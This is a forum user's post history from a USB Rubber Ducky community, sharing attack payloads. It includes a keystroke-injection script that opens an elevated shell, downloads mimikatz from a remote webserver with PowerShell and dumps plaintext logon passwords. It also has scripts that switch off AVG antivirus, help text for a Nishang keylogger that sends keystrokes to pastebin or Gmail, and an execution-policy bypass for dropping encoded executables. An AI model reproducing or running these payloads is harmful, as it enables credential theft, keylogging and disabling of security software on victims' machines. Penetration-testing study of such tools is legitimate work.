redmeatuk
-
Posts
11 -
Joined
-
Last visited
Posts posted by redmeatuk
-
-
I've not seen any switches or examples of how to get mimikatz to output to a file, there may be an equivalent of script/tee on Windows, this works but you will not see any output as standard error and output will be redirected to a textfile of your choosing e.g. -:
mimikatz.exe > output.txt 2>&1
Then just issue your commands as normal and exit.
Cloud passwords ? Not sure, give it time though I'm sure someone will figure it all out :)
-
overwraith, Not really seen any tutorials for Nishang, there should be some examples on http://labofapenetrationtester.blogspot.com
As for displaying the help for the powershell scripts try placing a .\ before the script it worked for me -:
PS C:\Users\luser\Desktop\nishang> Get-Help .\Keylogger.ps1 -full NAME C:\Users\luser\Desktop\nishang\Keylogger.ps1 SYNOPSIS Nishang Payload which logs keys. SYNTAX C:\Users\luser\Desktop\nishang\Keylogger.ps1 [-dev_key] <String> [-username ] <String> [-password] <String> [-keyoutoption] <String> [-MagicString] <St ring> [-CheckURL] <String> [<CommonParameters>] DESCRIPTION This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. PARAMETERS -dev_key <String> The Unique API key provided by pastebin when you register a free accoun t. Unused for tinypaste. Unused for gmail option. Required? true Position? 1 Default value Accept pipeline input? false Accept wildcard characters? -username <String> Username for the pastebin account where data would be pasted. Username for the tinypaste account where data would be pasted. Username for the gmail account where attachment would be sent as an att achment. Required? true Position? 2 Default value Accept pipeline input? false Accept wildcard characters? -password <String> Password for the pastebin account where data would be pasted. Password for the tinypaste account where data would be pasted. Password for the gmail account where data would be sent. Required? true Position? 3 Default value Accept pipeline input? false Accept wildcard characters? -keyoutoption <String> The method you want to use for exfitration of data. "0" for displaying on console "1" for pastebin. "2" for gmail "3" for tinypaste Required? true Position? 4 Default value Accept pipeline input? false Accept wildcard characters? -MagicString <String> The string which when found at CheckURL will stop the keylogger. Required? true Position? 5 Default value Accept pipeline input? false Accept wildcard characters? -CheckURL <String> The URL which would contain the MagicString used to stop keylogging. Required? true Position? 6 Default value Accept pipeline input? false Accept wildcard characters? <CommonParameters> This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer and OutVariable. For more information, type, "get-help about_commonparameters". INPUTS OUTPUTS -------------------------- EXAMPLE 1 -------------------------- PS >.\Keylogger.ps1 3 <dev_key> <username> <pass> RELATED LINKS http://labofapenetrationtester.blogspot.com/ http://code.google.com/p/nishang -
Hello all,
Apologies in advance if this is old news to all.
Anyone checked out Nishang ? It's a collection of handy Powershell scripts for penetration testing written by Nikhil Mittal which may come in handy for Ducky payloads -:
https://code.google.com/p/nishang/
http://labofapenetrationtester.blogspot.co.uk/
I had a look at http://nishang.googlecode.com/svn/trunk/ExetoText.ps1 in particular and this uses a technique for encoding binaries to text, demonstrated here -:
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
You may need to run the following as administrator to bypass a powershell security policy which may prevent you from creating an executable file
powershell.exe -executionpolicy bypass -file ExetoText.ps1 <payload.exe> <payload.txt>
Where payload.exe is your executable e.g. mimikatz.exe and payload.txt is the encoded version of your exe file.
If you were to place this encoded textfile and http://nishang.googlecode.com/svn/trunk/TexttoExe.ps1 on on your SD card if you're running twinduck firmware etc then you wouldn't need an Internet connection and download the file, you can just run this powershell script to convert the encoded text back to the exe. This may get flagged by AV so your mileage may vary.
DarkOperator also has a nice python script and exe to generate base64 encoded powershell commands too -:
Cheers
Aaron
-
Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1
This tool rocks!
-
There was certainly room for improvement, nice work shutin ;)
-
AFAIK it dumps passwords for the currently logged in user. Mimikatz only works with Windows.
Update - I see that you do not require SYSTEM privileges to get this to work, just need to launch cmd.exe with administrator privileges and then run mimikatz commands. I've amended the script.
-
Hello all,
This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes including the clear text passwords for wdigest from memory.
http://blog.gentilkiwi.com/securite/mimikatz/minidump
Requirements -:
- Webserver to host Mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit) you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture
- Local user needs to be an administrator account/privs
What does it do ?
1. It spawns a command shell with administrator privileges
2. It downloads mimikatz from a webserver using powershell
3. Using mimikatz to dump wdigest passwords from memory
4. Cleans up by deleting the binaries it downloaded
It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite e.g. socat, ncat SSL, stunnel etc If you have a firmware installed that lets you store files you could copy the output to the SD card. Also mimikatz file could be encoded and run through powershell to generate the executable instead of 'wget'ing' the file.
You may need to adjust timings in this script to play nice on your machine(s).
Script -:
REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe') DELAY 300 ENTER DELAY 3000 STRING %TEMP%\mimikatz.exe DELAY 300 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 1000 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTERThanks for reading :)
Aaron
-
Hello all,
I've created payloads to temporarily disable AVG protection for versions 2012 and 2013, tested on Windows 7. You may need to change DELAY in the following script to play nice on other machines. These timings worked for me. I didn't have much joy with the REPEAT statement, hence lots of tabs etc.
Does anyone have ducky scripts for other AV ?
Disable AVG 2013 -:
REM This payload temporarily disables AVG 2013 for 15 minutes assumes that UAC has not been used recently DELAY 3000 GUI r DELAY 1000 STRING C:\Program Files (x86)\AVG\AVG2013\avgui DELAY 400 ENTER DELAY 1000 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 1000 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 ENTER DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 ENTER DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 DOWN DELAY 400 DOWN DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 ENTER DELAY 400 TAB DELAY 400 DOWN DELAY 400 DOWN DELAY 400 ENTER DELAY 400 TAB DELAY 400 ENTER DELAY 400 ALT y DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 ENTER DELAY 400 ALT F4
Disable AVG 2012
REM this payload disables AVG 2012 until next restart assumes that UAC has not been used recently DELAY 3000 GUI r DELAY 400 STRING C:\Program Files (x86)\AVG\AVG2012\avgui DELAY 400 ENTER DELAY 1000 ALT t DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 DOWN DELAY 400 ENTER DELAY 400 DOWN DELAY 400 DOWN DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 SPACE DELAY 400 TAB DELAY 400 TAB DELAY 400 TAB DELAY 400 ENTER DELAY 400 TAB DELAY 400 DOWN DELAY 400 DOWN DELAY 400 ENTER DELAY 400 ALT y DELAY 400 ALT-F4
--
Cheers
Aaron
-
Ahh thanks for pointing me to the keymap files midnitesnake. I needed to make the following amendments to the resources\uk.properties file before the Ducky would echo out the backslash character.
Here are the modifications I made to the file -:
Comment out line 3
//KEY_BACKSLASH=64
ASCII code 92 is backslash so I left line 126 uncommented
ASCII_23 = KEY_BACKSLASH
Output from test script now prints following lines -:
backslash test - \
double backslash escaping test - \\
-
Hello all,
Apologies in advance if this is an issue that has previously been resolved. I searched this forum for my issue and in the FAQ but wasn't able to find a solution.
The issue I have is that I'm unable to get the Ducky to print a backslash character using a UK keyboard map. Printing forward slash character is fine.
Tested with the following -:
Firmware - stock firmware that came with the Ducky (v1 I believe) and the Ducky Community edition v2.1 (duck_v2.1hex)
Encoders - v1.2 duckencoder from the GitHub wiki and v2.6 from the Google Code Ducky Community site
Keyboard using UK keyboard map on Windows 7
Simple script to output a backslash character -:
DELAY 3000
GUI r
STRING notepad.exe
DELAY 100
ENTER
STRING backslash test - \
DELAY 100
ENTER
STRING double backslash escaping test - \\
Payload generation command with v2.6 encoder -:
java -jar encoder.jar -l uk -i ducktst.txt -o <ducky drive>\inject.bin
If I remove the -l uk option to default to the US keyboard map it will print a pound/hash character for the backslash which is what I would expect to see.
When the encoder generates the payload it passes all the checks but for the Duckyscript check it returns a warning - 'Key not found:KEY_NON_US_100'.
Anyone come across this problem before ?
Thanks in advance,
Aaron
[payload] Ducky script using mimikatz to dump passwords from memory
in Classic USB Rubber Ducky
Posted
I wasn't aware that mimikatz is now in meterpreter! meterpreter session needs to be running with SYSTEM privileges
Once you have a meterpreter shell you can run the following commands -: